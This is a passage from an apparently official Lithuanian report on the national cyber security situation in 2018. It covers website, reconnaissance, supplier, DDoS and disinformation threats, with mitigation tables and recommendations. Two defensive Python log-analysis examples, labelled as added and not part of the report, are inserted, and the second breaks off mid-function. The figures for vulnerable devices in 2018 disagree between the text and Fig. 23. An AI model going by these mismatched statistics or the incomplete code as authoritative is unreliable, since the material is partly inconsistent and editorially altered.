1 | An attacker connects to CMS via a user or administrator account. | Change the login addresses of the website CMS administrator and users, periodically change passwords, and enable a limit on the number of login attempts.

2 | An attacker exploits the vulnerabilities of the website. | Constantly update the OS of the server, the CMS and related plugins, do not use unnecessary CMS plugins, use a web application firewall, close unused ports, scan the website for vulnerabilities, regularly check logs for unauthorized access or other events, and install a “reverse proxy” solution to prevent the attacker from identifying the CMS.

3 | An attacker installs malware on the website. | Configure firewalls so that website CMSs can be logged in to only from reliable IP addresses (whitelisting of IP addresses).

4 | The hosting service provider does not guarantee cyber security for the website. | When website development, embedding and maintenance services are purchased, the contract should include a requirement for the service provider to ensure the cyber security of the website and its protection against hacking, and to ensure the compliance of the website with the organizational and technical cyber security requirements established by the Government.

5 | Information and communication traffic is intercepted; user data and / or login passwords are taken over during login to a website. | Install an SSL certificate on the website to secure the connection with encryption. It is one of the most effective cyber security tools for websites.

6 | The availability of the website is down. | Use a web application firewall, order more bandwidth, and purchase additional preventive DDoS services, for example, from a website hosting provider.

Electronic Communication Network Reconnaissance

Energy, government and defence sectors are the most scanned sectors in Lithuania.

Electronic network reconnaissance is related to the collection of information on the CISs of cyber security entities or ordinary users. The most popular way is to use Internet scanning tools to search for active online services and associated ports. Electronic communications network reconnaissance of this kind does not necessarily mean that malicious activity will be carried out. However, in most cases this is the first step in identifying vulnerable CIS spots, customizing malware and delivering it to them (fig. 14).

Fig. 14. Classification of Electronic Communication Network Reconnaissance by Lockheed Martin “Cyber Kill Chain” model (stages: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on objective)

Last year, an increasing intensity of Electronic Communications Network Reconnaissance of the SIR and CII managing entities was observed (fig. 15).


Fig. 15. Intensity of port scanning of entities providing critical services in 2018 (Quarter 1: 17%; Quarter 2: 21%; Quarter 3: 27%; Quarter 4: 35%)

During scanning, information is collected about organizations' Internet-connected devices, their types, enabled services, vulnerabilities, or open ports. After this information is collected, further cyber attacks are planned, or an attempt is made to hack into the infrastructure of organisations using publicly available information and tools. According to the NCSC, the sources of the scans are Russia, China and the USA (table 14). It is important to note that the primary source of scans does not necessarily represent the actual geographic location from which the scans are made.

Table 14. Primary information of the sources of Electronic Communications Network Reconnaissance

Country | Percentage

Russia | 17%

China | 13%

United States of America | 12%

Lithuania | 10%

The Netherlands | 8%

Ukraine | 6%

Other countries (94) | 34%

The cyber security entities providing critical services in the energy, national defence, government and finance sectors were the most scanned in 2018.

Fig. 16. Critical services' Electronic Communications Network Reconnaissance by sectors (sectors shown: Energy; Government; National defence; Finance; Agriculture; Transport; Public security and legal order; Foreign affairs and security policy; Environment; Other; Water supply; IT and electronic communications; Public awareness)

The cyber security of operational control systems and of the devices used in these processes, and cases of their reconnaissance, is one of the priorities of the NCSC activities (fig. 17). It should be noted that no cases were detected where such devices in the CIS of SIR managers and handlers, and of the CII managers, had a direct link to the Internet. Although the devices are not directly connected to the Internet, a link with the Internet can still be created, for example, by connecting to an isolated network a mobile device that was or is connected to the Internet. In 2018, the most searched devices were those that use the BACnet, Siemens S7, Modbus and Niagara Tridium Fox protocols (fig. 17).

Fig. 17. 2018 reconnaissance statistics of devices used in technological processes by protocols and / or equipment manufacturers in the CIS of SIR and CII managers (shown: BACnet; Siemens S7; Modbus; Niagara Tridium Fox; DNP3; EtherNet/IP; Mitsubishi Electric MELSEC-Q; PCWorx; Omron FINS; Red Lion Controls Crimson V3; IEC 60870-5-104; Codesys; ProConOS; GE Industrial Solutions-SRTP; HART-IP)


In order to find out how many devices that control technological processes are connected to the Internet in Lithuania, the NCSC performed an analysis, which identified 486 devices that control technological processes. The survey found that 67% of the devices that are directly connected to the Internet are controlled by the Modbus protocol (fig. 18). For example, such controllers can be used by home users to remotely control home heating, air conditioning or alarm systems. It should be noted that such devices are not always updated, which allows malicious actors to connect to the devices by exploiting known vulnerabilities and to intercept and / or disrupt their control.

Fig. 18. Manufacturers and / or communication protocols of devices involved in technological processes and accessible via the Internet (Modbus: 67%; Tridium Fox: 13%; Moxa Nport: 8%; Siemens S7: 8%; BACnet: 2%; Others: 2%)

Table 15. Mitigating threats of Electronic Communications Network Reconnaissance

No | Threat | Recommended ways to manage threat

1 | Attacker identifies active services and devices. | Change device ports to less frequently used ones, disable unused ports, and enable a reverse proxy to prevent the identification of active services and hardware or software from outside.
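The reconnaissance of technological-process devices described in this section can be tracked from a defender's own firewall records. The following added example (not NCSC tooling) labels probes by the default port of several of the industrial protocols named above, flags sources that sweep several hosts or protocols, and separately marks probes that the firewall let through. The CSV layout, addresses, allow-list and thresholds are constructed assumptions.

```python
"""Summarise ICS-protocol reconnaissance seen in firewall records (added example)."""
import csv
import io
from collections import Counter, defaultdict

# Default ports of protocols named in the report. Port-based labelling is a
# heuristic: a service moved to a non-default port will not be labelled.
ICS_PORTS = {
    ("tcp", 502): "Modbus",
    ("tcp", 102): "Siemens S7",
    ("udp", 47808): "BACnet",
    ("tcp", 1911): "Niagara Tridium Fox",
    ("tcp", 20000): "DNP3",
    ("tcp", 44818): "EtherNet/IP",
    ("tcp", 2404): "IEC 60870-5-104",
}

# Constructed firewall export using documentation address ranges; not real data.
SAMPLE_LOG = """\
time,src,dst,proto,dport,action
2018-11-05T03:10:01Z,203.0.113.50,192.0.2.10,tcp,502,deny
2018-11-05T03:10:01Z,203.0.113.50,192.0.2.11,tcp,502,deny
2018-11-05T03:10:02Z,203.0.113.50,192.0.2.12,tcp,502,deny
2018-11-05T03:10:02Z,203.0.113.50,192.0.2.12,tcp,102,deny
2018-11-05T03:11:40Z,198.51.100.9,192.0.2.10,udp,47808,deny
2018-11-05T03:12:00Z,10.0.5.20,192.0.2.10,tcp,502,allow
2018-11-05T03:12:05Z,198.51.100.77,192.0.2.10,tcp,443,allow
2018-11-05T03:13:00Z,198.51.100.9,192.0.2.11,tcp,1911,allow
2018-11-05T03:14:00Z,198.51.100.9,192.0.2.13,tcp,not-a-port,deny
"""


def analyse(log_text, allowed_sources=frozenset(), min_hosts=3):
    """Return (findings per source, percentage share of probes per protocol).

    allowed_sources: hosts expected to talk to controllers (assumed allow-list).
    min_hosts: distinct targets from one source that count as a sweep (assumed).
    """
    per_src = defaultdict(lambda: {"hosts": set(), "protocols": set(), "allowed": 0})
    by_protocol = Counter()
    for row in csv.DictReader(io.StringIO(log_text)):
        try:
            key = (row["proto"].strip().lower(), int(row["dport"]))
            allowed = row["action"].strip().lower() == "allow"
        except (KeyError, ValueError, TypeError, AttributeError):
            continue  # malformed or truncated record
        protocol = ICS_PORTS.get(key)
        if protocol is None or row["src"] in allowed_sources:
            continue
        entry = per_src[row["src"]]
        entry["hosts"].add(row["dst"])
        entry["protocols"].add(protocol)
        entry["allowed"] += allowed
        by_protocol[protocol] += 1

    findings = {}
    for src, entry in per_src.items():
        if entry["allowed"]:
            verdict = "exposure"  # a probe reached a controller port
        elif len(entry["hosts"]) >= min_hosts or len(entry["protocols"]) >= 2:
            verdict = "scan"      # sweep across hosts or protocols
        else:
            verdict = "probe"
        findings[src] = {
            "hosts": len(entry["hosts"]),
            "protocols": sorted(entry["protocols"]),
            "allowed": entry["allowed"],
            "verdict": verdict,
        }
    total = sum(by_protocol.values())
    shares = {p: round(100 * n / total, 1) for p, n in by_protocol.items()} if total else {}
    return findings, shares


if __name__ == "__main__":
    found, share = analyse(SAMPLE_LOG, allowed_sources={"10.0.5.20"})
    for src, info in found.items():
        print(src, info)
    print(share)
```

An "exposure" verdict corresponds to the situation the report warns about: a controller port that is reachable from outside the technological network.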

Reliability of contractors and software

Mobile apps often ask for excess data or full access to device functionality.

Fig. 19. Classification of threat of reliability of contractors and software by Lockheed Martin “Cyber Kill Chain” model (stages: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on objective)

A study by the NCSC on the origin of software in Lithuanian public sector institutions, whose summarized results were published in the 2017 National Cyber Security Status Report, led to decisions taken by the Government on the removal of Kaspersky Lab software from the systems of SIR managers and handlers, and of the CII managers. The problem of the reliability of contractors and / or software and hardware continued to be raised in 2018, both in the national media and through initiatives of individual entities applying to the NCSC. The NCSC initiated an analysis of the Yandex.Taxi mobile app, which revealed that the app requests excess data and requires access to a large amount of personal data and permission to use device features: to activate the camera and microphone (to record the user's environment), to use the contact list (a possibility to get information from the phone book and the accounts used), to manage calls, to identify the device identity and operational status, to manage text messages (a possibility to intercept received messages), to modify content stored in the smart device memory, to determine the exact (GPS) location of the device, and to manage network access (to send data via the Internet, monitor and manage network connections, manage Wi-Fi access) (fig. 20). The Yandex.Taxi mobile app also maintains an active connection with 10 IP addresses of servers in Moscow and Yekaterinburg, thus allowing personal data to leak beyond EU jurisdiction, where personal data regulation is not in line with EU standards⁷. The app can establish a connection via these addresses (which, based on geolocation IP database information, are located in different regions) regardless of whether it is in standby or active mode.

Fig. 20. Access to smartphone services and information requested by Yandex.Taxi app

Fig. 21. Information on Yandex.Taxi communications that was found during the NCSC study

The NCSC notes that, despite safe software code, mobile apps often ask for excess data or access to device functionality. Users usually provide such access and agree to the terms of use of apps without thinking that their data unrelated to the service provided by the software (such as communication data, device microphone recordings, photo gallery, etc.) may be leaked or become accessible to third parties without their knowledge and consent.

The reliability of contractors and / or software is also closely linked to public procurement procedures. Due to a lack of expertise or an underestimation of threats, the hardware or software purchased in public procurement organised according to the lowest price principle is not always the safest. In order to disrupt the provision of critical services, malicious actors also often target suppliers, because in this way infrastructure separated from the Internet can be accessed directly. An example of this is upgrades of equipment in technological networks, when a contractor who connects a laptop with mobile connectivity to a device on a technological network enables an unauthorized connection between the technological network and the Internet. This makes it possible to spread malicious code on an isolated network, and, given that updates on technological networks are not implemented immediately after they appear, the malicious code does not necessarily need to be the most advanced, because there are cases where servers with an outdated, vulnerable Windows XP OS are detected in the infrastructure of technological networks.

Table 16. Mitigation of threats related to the reliability of contractors

No | Threat | Recommended ways to manage threat

1 | Data leakage and / or disruption of services. | It is recommended to purchase hardware and software only from official sources and suppliers that operate under the General Data Protection Regulation and protect data in NATO or EU countries, and to limit the hardware or software functionality and the availability of information and services (for example, disable the ability to record sound or activate the camera on the smartphone, and prevent any connection of the technological network with the Internet in the organization).

2 | Spying. | It is recommended to purchase hardware and software from sources that are of good repute and pose no risk of cooperation with non-NATO and non-EU foreign intelligence services.

3 | Unauthorized technological network connection with the Internet. | Provide contractors with limited access to CIS, avoid giving remote access to CIS, and monitor and audit communication logs.

⁷ https://www.nksc.lt/naujienos/nacionalinis_kibernetinis_saugumo_centras_rekomend.html


DDoS cyber incidents and equipment vulnerabilities

A relatively small number of electronic service interference attacks was registered (31 cases).

The trend shows that the number of devices with vulnerabilities is increasing, thus there is a real threat that these devices can be included in a botnet and used for DDoS cyber attacks.

Cyber incidents of electronic service disruption are mostly carried out to disrupt access to CIS services. DDoS attacks are usually carried out using botnets (fig. 22).

Fig. 22. Classification of cyber incidents of electronic service disruption by Lockheed Martin “Cyber Kill Chain” model (stages: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on objective)

In 2018, the NCSC registered 31 DDoS attacks. By their importance, 20 of them were classified as medium. DDoS attacks were directed at the availability of services provided by the CIS of the Ministry of the Interior, SE Center of Registers, as well as by the CIS of the Seimas of the Republic of Lithuania.

It should be noted that the number of devices with vulnerabilities has increased. Such devices can be taken over and included in a botnet, i.e. they can be used for DDoS attacks. In 2018, the NCSC captured 28,630 devices with vulnerabilities. Compared to previous years, this number has been increasing by one fifth each year from 2015 onwards (18,427 devices were captured in 2015, 20,490 devices in 2016, and 24,612 devices in 2017; fig. 23).

The increase in the number of devices with vulnerabilities is related to the rapidly growing popularity of IoT.

Fig. 23. Trend of devices with vulnerabilities in 2015 – 2018 (2015: 18,427; 2016: 20,490; 2017: 24,612; 2018: 29,747)

Table 17. Mitigation of threats related to device vulnerabilities.

No | Threat | Recommended ways to manage threat

1 | Default passwords are used to connect to the device. | Change the default passwords of the devices.

2 | The device is accessed through a vulnerability that has not been fixed. | Regularly update IoT application and software.

3 | Attacker can see passwords and other sensitive information stored in the device. | Disable the possibility to save passwords on your device.

4 | Attacker can intercept information or passwords during device communication. | Purchase and use devices with encrypted communication sessions. Use encryption for the communications of the device.

5 | Attacker takes advantage of the excess functions of the device and gains access to CIS. | Wherever possible, check whether or not the device supports excessive functionality (open ports).

6 | The device communicates with the outside and, possibly, leaks information. | Before purchasing a device, make sure that its manufacturer meets the requirements of the General Data Protection Regulation or that the data sent is protected by EU law.

7 | An insecure device is acquired. | Avoid unknown manufacturers whose country of origin and reliability are difficult to check.


Notable cyber incidents

In 2018, notable cyber incidents in Lithuania were associated with hybrid threats, where cyber attacks were matched to information warfare.

Notable cyber incidents of 2018 were related to the detection of vulnerabilities in CIS, malware, taken-over devices and malicious actions in CIS.

Fig. 24. Classification of notable cyber incidents by Lockheed Martin “Cyber Kill Chain” model (stages: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, Actions on objective)

In 2018, the NCSC captured cyber incidents of high significance, in which cyber security entities were discovered to have an advanced persistent threat, related to foreign intelligence activities, that had been running for a long time. Cyber incidents that by their nature are related to information attacks and the exploitation of known vulnerabilities were the incidents that most often created resonance in society, although due to their limited impact they are not classified as high-impact or dangerous cyber incidents by their significance.

In 2018, cyber incidents based on social engineering methods, which were correlated with information attacks, were also monitored (fig. 25). One example is the cyber incident on the “TV3” website in 2018. After a website administrator account was taken over, a counterfeit scandalous article was published. Right after that, letters from a spoofed TV3 e-mail address were sent to the target audience with a document that contained malicious code to infiltrate other CISs.

Fig. 25. Steps of cyber and information attacks during cyber attack (cyber attack: the “TV3” website is hacked; information attack: a fake article is published on the “TV3” website; cyber attack: letters created using social engineering methods, with an attachment containing malicious code, are sent from a simulated “TV3” e-mail address)

An important and notable cyber incident in 2018 was related to the disclosure of a vulnerability of the “e-sveikata” information system. The person who used the programming error publicly disclosed the vulnerability and got access to personal data. This incident raised the problem of responsible information disclosure, when third parties, instead of the responsible institutions, are informed about vulnerabilities. Publicizing vulnerabilities of information systems and / or ways of exploiting them may create conditions for malicious actors to access personal data stored on CIS. The NCSC notes that when a security vulnerability is detected, the system manager and the NCSC should be informed first, and that one should not attempt to exploit the security vulnerability in the affected system, or to modify the data or otherwise affect it.

At the end of 2018, a targeted spam distribution campaign was conducted against public authorities, government representatives and public figures; it disturbed e-mail service accessibility by filling the addressees' inboxes with thousands of unwanted e-mails.

The cyber attack was carried out in an automated way by including individuals' e-mail addresses in various promotional newsletter subscriptions whose senders were not necessarily malicious. The NCSC provides guidance on how to protect against cyber incidents of this kind.


INFORMATION ATTACKS

2,456 cases of information attacks were identified, 29% of them in the area of defence.

The Department of Strategic Communication of the Lithuanian Armed Forces analyses and processes events and assesses trends related to the activity of Internet users in Lithuania and other countries in cyberspace. The main focus is on reviewing the most important cases of the flow of negative information directed against Lithuanian society during the year, i.e. disinformation, manipulation, fake news and propaganda.

Due to globalization and the evolution of information technology, many countries in the world that have different attitudes towards democratic values are united in a common cyberspace where the boundaries of data exchange are narrow or non-existent. This creates conditions for information operations to affect the natural development process of democratic states: by manipulating their public opinion with the help of counterfeit and provocative news and digital entertainment products, by conducting cyber attacks in order to keep individuals from information or to distort its content, and by using robots on social networks and in comments, as well as hired opinion formers who fuel war and promote national, racial, religious and social dissension.

In 2018, the largest source of negative information in Lithuania was the media controlled by the Government of the Russian Federation and the activities of information channels indirectly related to it and operating in the territory of Lithuania. News portals, social network users and television channels linked to the Kremlin and its regime were guided, in conducting information attacks, by the long-term trends in media consumption habits in Lithuania and acted purposefully. As in previous periods, the main directions of information activities carried out by Russia remained unchanged and were mainly focused on escalating issues of strategic importance and those that are socially sensitive to Lithuania, such as historical memory or socio-economic problems. The choice of these topics reflects the long-term strategic interests of the Russian Federation and its aspirations to maintain control of its information space and influence in the information areas of other states, i.e. to have political, economic, informational and other leverage over the agenda of their internal processes.

A total of 2,456 cases of unfriendly information activities were identified last year (an average of about 205 per month). Their distribution by strategically important area: defence - 29%; protection of constitutional foundations - 23%; culture and education - 18%; foreign policy - 16%; economy and energy - 8%; social security - 6% (Fig. 26).

Fig. 26. Concentration of negative information in respect of strategic areas in 2018 (chart legend: Defence; Protection of constitutional foundations; Culture and education; Foreign policy; Economy and energy; Social security)

The most intense negative information activity was captured in the area of defence (almost one third of all cases). A large number of cases were also divided between protection of constitutional foundations, culture and education, and foreign policy. Slightly less propaganda occurred in the areas of economy and energy, and social security. However, it would be wrong to assume, for example, that social security issues were less important than those related to defence. It is worth emphasizing that propaganda on every topic was understood individually, but unrelated to the overall picture, and the assessment of its damage was not limited to quantitative expression (for example, in October social issues were much more important than those of defence, but their incidence in the total flow was quantitatively lower than that of defence-related issues). In terms of propaganda activity, January, April, June and October stand out as the months in which the most unfriendly information activities were identified (Fig. 27). This coincided with significant foreign policy and domestic events, which sources of information unfriendly to Lithuania attempted to use to form a negative image of the country in the West and to encourage mutual opposition between Lithuanian public audiences.

Fig. 27. Dynamics of negative information flow in respect of the state's strategic areas in 2018 (monthly chart, January to December; legend: Defence; Protection of constitutional foundations; Culture and education; Foreign policy; Economy and energy; Social security)

The most striking example of such action in Lithuania: in June, during the military exercise “Saber Strike 2018”, information was published on the website gelezinisvilkassite.wordpress.com claiming that a child had been killed in an accident involving the US military armored vehicle “Stryker” (Fig. 28).

Fig. 28. Fake news: a child was claimed to have been killed in a road accident involving the US military vehicle “Stryker” (June 2018)


INCREASING CYBER SECURITY RESISTANCE

Organizing cyber security

In 2018, the Government of the Republic of Lithuania approved the National Cyber Security Strategy, identifying the key directions of the national cyber security policies in public and private sectors until 2023.

The decision was made to develop a secure national data transmission network that connects institutions ensuring vital functions of the state (hereinafter referred to as the Secure network).

Lithuania's first National Cyber Security Strategy was approved in 2018. It is an essential document in which, taking into account the conclusions of the environmental analysis, Lithuanian and European Union legislation, good practices of other countries and suggestions of public and private sector representatives, five-year goals and tasks in the area of cyber security have been set for the public and private sectors and for Lithuanian science and study institutions. The strategy aims to strengthen the state's cyber security and the development of cyber defence capabilities, to ensure the prevention, repression and investigation of criminal offenses, to promote cyber security culture and innovation development, to strengthen close public and private sector and international cooperation, and to ensure the implementation of international obligations.

At the same time, the criteria for evaluating the implementation of the strategy and their implications to be achieved were approved; the strategy itself will be implemented through inter-institutional action plans, which set out the measures for implementing the strategy and the funds for their implementation. In 2018, the consolidation of national cyber security functions and capabilities that was started in mid-2017 was also completed, i.e. the functions of information resources security, electronic communications networks and information security, and cyber security policy formation and implementation were merged and transferred to the Ministry of National Defence.

In 2018, a new version of the Cyber Security Law provisions was introduced, amendments to the Code of Administrative Offenses of the Republic of Lithuania were adopted, and the provisions of legal acts implementing the Cyber Security Law were updated. These legislative changes were made not only to transpose Directive (EU) 2016/1148 of the European Parliament and of the Council of 6 July 2016 concerning measures for a high common level of security of network and information systems across the Union; they also made it possible to improve the organization and control of the cyber security system, to clarify the functions of cyber security policy-making and implementing bodies and the obligations and responsibilities of cyber security entities, and to establish additional measures for ensuring cyber security.

Following the change of the legislation, the NCSC's competence was expanded, giving it more rights to control and supervise cyber security entities. The NCSC's responsibilities are no longer limited to supervision: it also acts as an authority that controls cyber security entities at national level and applies administrative responsibility to entities.

In 2018, the General Data Protection Regulation (EU) 2016/679 on the protection of personal data and on the free movement of such data was adopted (hereinafter referred to as the Regulation). In order to avoid the liability applied by the State Data Protection Inspectorate for non-compliance with the provisions of the Regulation, organizations started to manage their IT infrastructure more actively, i.e. they not only began to regulate the use of personal data in their activities, but also started planning and implementing cyber security measures to protect personal data.

In order to raise the level of cyber security in Lithuania, in the second half of 2018 the Ministry of National Defence prepared an amendment to the Law on the Management of State Information Resources, proposing to oblige state and municipal institutions and bodies that carry out national mobilization tasks for the performance of vital state functions to use the Secure network. The Secure network would be separated from public communications networks and could operate in crisis or war conditions. The aforementioned law was adopted by the Seimas of the Republic of Lithuania on 20 December 2018. Its implementation will not only ensure faster and more effective response to cyber incidents, but also save resources allocated to cyber security, as the assurance of cyber security will be centralized and conditions for more effective use of collective defence measures will be created.

Creating a cyber security environment

In 2018, the Ministry of National Defence and the NCSC signed an agreement with the media.

In 2018, the Ministry of National Defence, in co-operation with the partners, began establishing a Regional Cyber Security Center in Kaunas.

In 2018, Lithuania started implementing the European Union Permanent Structured Cooperation Project “Cyber Rapid Response Teams and Mutual Assistance in Cyber Security”, which was initiated in 2017.

Cyber incidents are increasingly disturbing not only the public and private sectors, but also the media, which plays an important role in developing a secure cyber space and objectively informing the Lithuanian population. On 28 August 2018, the Ministry of National Defence, together with the NCSC and the largest Lithuanian news portals and agencies, signed a cooperation agreement, the main objective of which is to enhance cooperation in the area of cyber security and to strengthen the cyber security of the mass media and their resistance to cyber threats. In the course of implementing the provisions of the cooperation agreement, cyber security training for journalists was held on 23 October 2018 at the Grand Duke Gediminas Staff Battalion of the Lithuanian Armed Forces. Journalists learned how to critically evaluate cyber space, to recognize cyber threats and to deal with cyber incidents.

In 2018, the Ministry of National Defence initiated work on the establishment of a Regional Cyber Security Center. The aim of this future center is to increase Lithuania's cyber-resistance and, in cooperation with partners, to strengthen the ability of Lithuanian cyber defence specialists to recognize and prevent cyber incidents in our region in a timely manner.


Training for media representatives. Photo by Ieva Budzeikaitė

In order to strengthen the European Union's cyber security and defence capabilities, and to manage cyber incidents across national borders more effectively, it is necessary to cooperate with other European Union countries. In 2017, the Ministry of National Defence of the Republic of Lithuania initiated (led by Edvinas Kerza, the Vice-Minister of National Defence) the European Union Permanent Structured Cooperation Project “Cyber Rapid Response Teams and Mutual Assistance in Cyber Security” (hereinafter referred to as the PESCO Project), which was launched in February 2018. The aim of the project is to pool and utilise the cyber defence capabilities, knowledge and competences of the Member States. Thirteen countries are participating in the PESCO Project: eight are members of the project (Estonia, Spain, Croatia, Lithuania, Poland, Netherlands, Romania, Finland) and five act as observers (Belgium, France, Greece, Slovenia, Germany). On 25 June 2018, six Member States signed a Memorandum of Understanding on a Cyber-Rapid Response Force and Mutual Assistance in Cyber Security at the meeting of the European Union Foreign Affairs Council in Luxembourg. On 24 November 2018, Poland joined the other signatories - Lithuania, Estonia, Spain, Croatia, the Netherlands and Romania. By means of the memorandum, the countries expressed the political will to seek closer cooperation under the project. Cyber Rapid Response Teams (hereinafter referred to as the teams) will help each other to ensure a higher level of cyber-resistance and will respond jointly to cyber incidents. Teams composed of cyber experts from different European Union countries will rotate, taking over the watch every six months. Teams will also be able to assist other Member States and European Union institutions in carrying out joint security and defence policy operations, as well as partner countries. Member States are also working together to develop a common set of cyber tools to be used by watch-keeping teams. The leaders of this project, Tadas Šakūnas and Eglė Vasiliauskaitė, have also prepared a legal and political cyber-rapid response force memo, which can be used by the project participants and by other countries that would like to join the project in the future.

Legal and political cyber-rapid response force memo, 2019

It is important to improve the competence of cyber security professionals by constantly testing their skills in practice. For this reason, cyber security entities and the NCSC regularly participate in international cyber security exercises, such as Locked Shields 2018, Cyber Europe 2018 and Cyber Coalition 2018. It is noteworthy that last year all of them simulated cyber attacks against critical infrastructure, emphasized interdependence, and developed skills for escalation, threat management and attribution of cyber attacks. However, the most important was the exercise Cyber Shield 2018, which was organized in 2018 together with the Lithuanian Armed Forces exercise Amber Mist 2018. During this exercise, cyber security entities not only improved their skills in recognizing cyber incidents and informing the competent authorities about them; team call procedures were also tested in practice, with the project participants evaluating in real time how to provide assistance to Lithuania. Experience gained during the exercise has been transferred to the memos on calling for rapid response forces.

Cyber security exercise Cyber Shield 2018. Photo by Giedrė Maksimovicz


Cyber security entities also continued to improve their cyber security status by implementing the organizational and technical cyber security requirements set by the Government of the Republic of Lithuania. It should be noted that CII managers have made good progress in implementing the requirements: these entities implemented 63% of organizational and 50% of technical cyber security requirements (last year, the CII managers implemented only 26% of organizational and 6% of technical cyber security requirements) (Fig. 29). Most entities that have not implemented the requirements plan to implement them in the future (by 1 January 2021 at the latest). As in 2017, managers and handlers identify lack of expertise and of financial and human resources as the main reasons preventing the implementation of the requirements. They also emphasize that the requirements are too strict.

Fig. 29. Organizational and technical cyber security requirements implementation of CII and SIR managers (2018) (chart panels: Organisational requirements, Technical requirements; legend: Implemented all requirements; Implemented some of the requirements; Have not implemented the requirements or failed to provide information)


CONCLUSIONS AND RECOMMENDATIONS

Conclusions

1. The country's cyber security policy is systematically implemented by decisions of the Government of the Republic of Lithuania. In 2018, the National Cyber Security Strategy was approved. Key directions for cyber security development in the public and private sectors were set for the period until 2023. The consolidation of cyber security in Lithuania was also completed, and the decision was made to create a Secure National Data Transmission Network that will connect institutions ensuring vital functions of the state.

2. The number of cyber incidents decreased, but attacks have become more sophisticated. In 2018, 53,183 cyber security incidents were registered in Lithuania, i.e. 3% less than in 2017. However, cyber incidents have become more complex, attacks are becoming more sophisticated and it is impossible to investigate them by automated means. The NCSC investigated 914 cyber incidents of high and medium significance, that is 41% more than in 2017.

3. The greatest cyber security threats are due to the high number of vulnerable devices connected to the Internet, vulnerable websites and the use of social engineering methods. In 2018, the NCSC registered a 21% rise in devices with vulnerabilities. Half of the 52,000 identifiable websites with CMS in Lithuania are vulnerable, and entities still do not regard IT services and information stored in CIS as assets. In 2018, the NCSC captured 25% more attempts than in 2017 to infiltrate communications and information systems using social engineering methods.

4. Critical Information Infrastructure is an object of active malicious cyber activity. In 2018, most malware was detected in the government (39% in total), energy (20%), and foreign affairs and security policy (19%) sectors. Last year, electronic communications network scanning activity increased by 18%, with the energy, government and national defence sectors receiving most interest.

5. Information warfare is mostly directed to the defence sector. In 2018, negative information activities were targeted at the most important areas of Lithuanian national security. Compared to 2017, the overall negative information flow observed in the Lithuanian information space remained stable and high. 2,456 cases of information attacks were identified, 29% of them in the area of defence.


Recommendations

Basic ways of managing social engineering threats

1. Move the mouse cursor over a link and check that the website address displayed is genuine: make sure that the address does not contain grammatical errors and that the address name is logical and easy to read.

2. Make sure the session with the website is encrypted, i.e. an SSL certificate is used (the website address must begin with https), and use multi-factor authentication tools (such as password, mobile device, fingerprint).

3. Protect your login passwords: never keep them in plain view at work, on your computer, or on your mobile phone.

4. Be critical about online ads and those sent by e-mail (especially about big discounts offered); check requests to make cash remittances by other means, for example, verify the circumstances by phone call.

5. Do not open documents, files or software that have been sent or downloaded from an unreliable source (for example, from sources of illegal software distribution).

6. Do not act hastily, avoid emotions, and fully clarify the necessity of the actions requested.

Mitigation of malware threats

1. Use legal OS and software; use antivirus software, including for preventive scanning of data on your device; install the manufacturer's software updates as soon as they appear.

2. Do not download files from unreliable sources, install plugins in your browser to identify malicious websites, use antivirus software to scan suspicious downloaded files, and check them using the tools of the NCSC*.

3. Do not use unreliable, unverified memory drives or other devices that connect via USB. Format them regularly and disable automatic file execution.

4. Back up your data periodically and keep backup copies separately (for example, on an external storage device).

5. Encrypt confidential information and protect it with a secure password. Use cryptographic tools to transmit information, such as email encryption.

6. Use network segmentation and several filtering tools (such as network and workstation firewalls), and physically separate important CISs.

Mitigation of vulnerable websites

1. Change the login addresses of the website CMS administrator and users, periodically change passwords, and limit the number of login attempts.

2. Constantly update the OS of the server, the CMS and related plugins, do not use unnecessary CMS plugins, use a web application firewall, close unused ports, scan the website for vulnerabilities, regularly check logs for unauthorized access or other irregularities, and install a “reverse proxy” solution to prevent an attacker from identifying the CMS.

3. Configure firewalls so that the CMSs of websites can only be logged in to from reliable IP addresses (whitelisting of the IP addresses).

4. When website development, embedding and maintenance services are purchased, the contract should include a requirement for the service provider to ensure the cyber security of the website and its protection against hacking, and to ensure the compliance of the website with the organizational and technical cyber security requirements established by the Government.

5. Install an SSL certificate on the website to secure an encrypted connection. It is one of the most effective cyber security tools for websites.

6. Use a web application firewall, order more bandwidth, and purchase additional preventive DDoS services, for example, from a website hosting provider.
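Points 1 to 3 above (a changed login address, a limit on login attempts, logins only from reliable IP addresses) and the log checks in point 2 can be verified from the web server's access log. The following Python code is an added example, not part of the report; the login path, the allowed network, the limits and the log lines are constructed assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_PATH = "/staff-entry"                                # hypothetical renamed CMS login address
ALLOWED_NETS = [ipaddress.ip_network("198.51.100.0/24")]   # constructed "reliable" office range
MAX_ATTEMPTS = 3                                           # login POSTs tolerated per window
WINDOW = timedelta(minutes=5)

# Common/combined access log format: ip, two ids, [time], "request", status, size.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed log lines; all addresses come from documentation ranges.
SAMPLE_LOG = """\
198.51.100.20 - - [12/Mar/2018:09:00:01 +0200] "POST /staff-entry HTTP/1.1" 302 0
203.0.113.50 - - [12/Mar/2018:09:01:10 +0200] "GET /staff-entry HTTP/1.1" 200 512
203.0.113.50 - - [12/Mar/2018:09:01:12 +0200] "POST /staff-entry HTTP/1.1" 200 530
203.0.113.50 - - [12/Mar/2018:09:01:14 +0200] "POST /staff-entry HTTP/1.1" 200 530
203.0.113.50 - - [12/Mar/2018:09:01:16 +0200] "POST /staff-entry?next=/ HTTP/1.1" 200 530
203.0.113.50 - - [12/Mar/2018:09:01:18 +0200] "POST /staff-entry HTTP/1.1" 200 530
192.0.2.9 - - [12/Mar/2018:09:02:00 +0200] "GET /index.html HTTP/1.1" 200 1024
198.51.100.20 - - [12/Mar/2018:09:20:00 +0200] "POST /staff-entry HTTP/1.1" 302 0
198.51.100.20 - - [12/Mar/2018:09:40:00 +0200] "POST /staff-entry HTTP/1.1" 302 0
198.51.100.20 - - [12/Mar/2018:10:00:00 +0200] "POST /staff-entry HTTP/1.1" 302 0
"""


def audit(log_text):
    """Return (ip, finding) pairs for requests to the CMS login address."""
    outside = set()             # clients that reached the login page from outside the allowlist
    posts = defaultdict(list)   # login submissions per client
    for line in log_text.splitlines():
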